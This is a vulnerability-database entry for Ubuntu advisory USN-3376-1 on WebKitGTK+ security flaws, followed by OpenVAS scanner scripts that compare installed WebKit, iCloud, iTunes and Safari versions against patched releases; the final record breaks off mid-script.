ID USN-3376-1 Type ubuntu Reporter Ubuntu Modified 2017-08-02T00:00:00
Description
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
{"openvas": [{"lastseen": "2019-05-29T18:34:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-2538", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-03T00:00:00", "id": "OPENVAS:1361412562310843266", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843266", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3376-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3376_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3376-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843266\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-03 07:16:13 +0200 (Thu, 03 Aug 2017)\");\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\",\n \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\",\n \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\",\n \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3376-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 17.04,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3376-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3376-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.17.04.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.6-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310873180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873180", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_24bddb96b5_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873180\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:40 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WQG4TVFXCPDMB3M6X46ISBMRZAHJZ43\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310873200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873200", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_73d6a0dfbb_webkitgtk4_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873200\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:47 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOV6OOFLOHZALSKLNVHTQVXB43SXE5LW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "description": "The remote host is missing an update for the ", "modified": "2019-03-26T00:00:00", "published": "2017-08-08T00:00:00", "id": "OPENVAS:1361412562310873226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873226", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9d572cc64a_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873226\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:36:34 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VIXDC655D7574NMXWPNXAFDI2JHBTWZR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:20:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811252", "type": "openvas", "title": "Apple iCloud Multiple Vulnerabilities-HT207921 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Multiple Vulnerabilities-HT207921 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811252\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7010\", \"CVE-2017-7013\", \"CVE-2017-7018\", \"CVE-2017-7020\",\n \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\",\n \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\", \"CVE-2017-7043\",\n \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7049\", \"CVE-2017-7064\",\n \"CVE-2017-7019\", \"CVE-2017-7012\");\n script_bugtraq_id(99889, 99879, 99885, 99890);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 12:15:28 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple iCloud Multiple Vulnerabilities-HT207921 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An out-of-bounds read in libxml2.\n\n - Multiple memory corruption issues in WebKit.\n\n - A memory initialization issue in WebKit.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code and gain access to potentially sensitive\n information.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2.2\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207927\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!icVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## 6.2.2 = 6.2.2.39\nif(version_is_less(version:icVer, test_version:\"6.2.2.39\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2.2\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-03T20:37:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "modified": "2020-02-28T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811535", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811535", "type": "openvas", "title": "Apple iTunes Multiple Vulnerabilities-HT207928 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Multiple Vulnerabilities-HT207928 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811535\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2017-7053\", \"CVE-2017-7010\", \"CVE-2017-7013\", \"CVE-2017-7018\",\n \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\",\n \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\",\n \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7049\",\n \"CVE-2017-7064\", \"CVE-2017-7019\", \"CVE-2017-7012\");\n script_bugtraq_id(99884, 99889, 99879, 99885, 99890);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 11:40:40 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple iTunes Multiple Vulnerabilities-HT207928 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Multiple memory corruption issues in WebKit component.\n\n - A memory initialization issue in WebKit component.\n\n - An out-of-bounds read error in libxml2 component.\n\n - An access issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and disclose sensitive information.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.6.2 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.6.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207928\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\n# vulnerable versions, 12.6.2 = 12.6.2.20\nif(version_is_less(version:vers, test_version:\"12.6.2.20\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.6.2\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-17T14:18:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2017-07-20T00:00:00", "id": "OPENVAS:1361412562310811251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811251", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities-HT207921", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities-HT207921\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n 